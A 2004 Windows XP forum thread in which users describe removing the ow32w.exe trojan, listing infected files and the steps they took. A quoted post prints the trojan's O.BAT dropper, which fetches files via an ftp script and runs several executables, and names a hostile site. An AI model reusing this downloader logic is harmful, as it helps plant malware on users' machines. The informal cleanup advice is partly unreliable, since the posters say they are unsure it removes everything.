re: belgiandip.com: Mutated / Migrated? ow32w.exe
Saturday, November 13, 2004 at 8:42 pm Windows XP Annoyances Discussion Forum
Posted by ccam
(1 messages posted)
Well, I just deleted no less than 69 different versions of this #@&%* bug, all as
suggested above, 64kb in size with thunderdome or totempole listed in the company
field. And as advised, I did have to End Process for many in Task Manager. Wish
I could attach a listing, but follow those instructions and see if it works for you.
On Wednesday, April 21, 2004 at 5:34 pm, u660699 wrote:
>Hi, whilst I never went near belgiandip.com ....
>I did manage to pick up something which sounds very similar to the problems described
>in other posts here ...
>details plus how I fixed follows ....
>
>ow32w.exe Trojan from Totempole found on my XP machine - now removed (I hope).
>
>Symptoms: Explore Notepad hijacked . Right clicking to open causes pop ups
>
>Missed by SpyBot, Adaware, Trendmicro Antivirus :-(
>Brownie points to Hotmail for spotting a virus when I had all the offending files
>zipped up!
>Internet access attempts stopped by Zonealarm.
>
>Thanks to Spybot "Tools-System start up" for spotting ow32w.exe and B6Jhpjm.exe
>
>ow32w was running as a process.
>Killed it (plus any spawned processses) using Process Explorer from www.sysinternals.com
>
>No registry changes required that I could spot - unless ofcourse you know better....
>
>Removing the following files fixed it.
>
>\Local Settings\Temp
> ======================================================================
> B6Jhpjm.exe 228 KB 16/04/2004 11:31:44 AM a
> Total 1 file(s); Size: 233667 Byte(s)
>
>\Program Files
> ================================================================
> over.exe 3 KB 20/04/2004 11:22:34 PM a
> pup.exe 245 KB 20/04/2004 11:22:34 PM a
> Total 2 file(s); Size: 254901 Byte(s)
>
>\Windows
> ==========================================================
> bdl94126.exe 58 KB 01/03/2004 04:02:00 PM a
> pup.exe 64 KB 26/02/2004 04:17:50 PM a
> update12.js 1 KB 01/03/2004 11:50:40 PM a
> Total 3 file(s); Size: 126314 Byte(s)
>
>\Windows\prefetch
> ===================================================================
> B6JHPJM.EXE-16AE5CE1.pf 21 KB 16/04/2004 11:31:54 AM a
> BDL94126.EXE-195022B7.pf 24 KB 20/04/2004 11:23:00 PM a
> OW32W.EXE-26648B26.pf 12 KB 20/04/2004 11:22:56 PM a
> PUP.EXE-0402600B.pf 15 KB 20/04/2004 11:22:44 PM a
> PUP.EXE-052747AD.pf 17 KB 20/04/2004 11:22:44 PM a
> PUP.EXE-3934063A.pf 15 KB 20/04/2004 11:22:46 PM a
> Total 6 file(s); Size: 110244 Byte(s)
>
>\Windows\system32
> ===================================================================
> O 1 KB 16/04/2004 11:32:16 AM a
> O.BAT 1 KB 16/04/2004 11:32:16 AM a
> ow32w.exe 64 KB 26/02/2004 04:17:50 PM a
> Total 3 file(s); Size: 65880 Byte(s)
>
>O.BAT contains the following:
>==========================================================
>if not exist C:\WINDOWSstatuslog ftp -s:o
>if exist bs5-nt15v.exe bs5-nt15v.exe
>if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
>if exist silent.exe silent.exe
>if exist CS4P028.exe CS4P028.exe
>==========================================================
>
>I didn't find cs4p028.exe or silent.exe on my machine but a couple of postings suggest
>others have.
>Other postings suggest that other files are also created.
>I deleted a " Thinstaller client " that may also be associated with this
>zonealarm also shows a file u070104.exe (unclear on timings but looks dodgy!)
>
>ow32w.exe Properties Version Company information suggests that " Totempole " are
>the "people" concerned.
>
>WARNING
>The Javascript file contains the url of a web site
>WARNING >>> searchcentral.cc <<< DANGEROUS TROJAN SITE
>PLEASE RESIST the temptation to browse the site.
>I went in with IE6.0 (yes I know it is stupid and I have now installed the latest
>SP)
>with the Security Settings on High and got several pop-ups plus at least 2 executables
>(over.exe and pup.exe) installed....I'm not going back
>
>
>Worrying aspect from my viewpoint is that:
>a) I remain unclear how I picked this up
>b) lost some faith in spybot and adaware
>c) not convinced I have found everything
>Any suggestions/thoughts welcomed.
>
>Hopefully info provided is sufficent to help others / encourage some updates.
>
>
>
|
All messages in this thread [show all]
 |  |  | re: belgiandip.com: Mutated / Migrated? ow32w.exe (ccam: Sat, Nov 13, 2004, 8:42 pm) |
| |
| |
| |
Return to the Windows XP Discussion Forum
|
|